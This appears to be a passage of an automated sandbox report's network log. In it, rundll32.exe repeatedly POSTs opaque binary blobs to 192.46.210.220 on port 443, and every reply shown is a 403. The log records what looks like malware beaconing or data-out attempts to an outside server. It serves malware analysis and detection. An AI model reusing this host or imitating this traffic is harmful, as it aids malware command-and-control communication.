                                                                                                      2021-10-28 02:47:38 UTC179OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:39 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.749932192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:38 UTC184OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:38 UTC184OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:39 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.749939192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:42 UTC189OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:42 UTC189OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:43 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.749940192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:42 UTC194OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:42 UTC194OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:43 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.749792192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:46:33 UTC19OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:46:33 UTC20OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:46:34 UTC24INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:46:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.749948192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:46 UTC199OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:46 UTC199OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:47 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.749950192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:46 UTC204OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:46 UTC204OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:47 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.749974192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:50 UTC209OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:50 UTC209OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:51 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.749976192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:50 UTC214OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:50 UTC214OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:51 UTC219INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      44192.168.2.750000192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:54 UTC219OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:54 UTC219OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:54 UTC229INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      45192.168.2.750001192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:54 UTC224OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:54 UTC224OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:55 UTC229INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:55 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      46192.168.2.750008192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:58 UTC229OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:58 UTC229OUTData Raw: 6e d6 8e 6d 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: nm&W^>'F0oK#9M[.p(lD4gk7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:58 UTC239INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      47192.168.2.750009192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:47:58 UTC234OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4857
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 02:47:58 UTC234OUTData Raw: 17 c8 8c 16 10 0e 26 ac 57 b7 5e a3 19 3e 1b 95 e9 ab 27 f9 f8 ff f2 15 01 46 83 c8 dc 05 c4 18 a4 a7 e6 30 6f 05 df bf c6 fe fd ee d4 4b 9e de a8 b2 23 39 c5 05 1b 4d 5b 2e dc 0c 70 14 28 f4 6c ae 94 0c 44 fd 34 97 0c be 8c 67 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                      Data Ascii: &W^>'F0oK#9M[.p(lD4gkV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                      2021-10-28 02:47:59 UTC239INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 02:47:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      48192.168.2.750019192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 02:48:01 UTC239OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4869
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
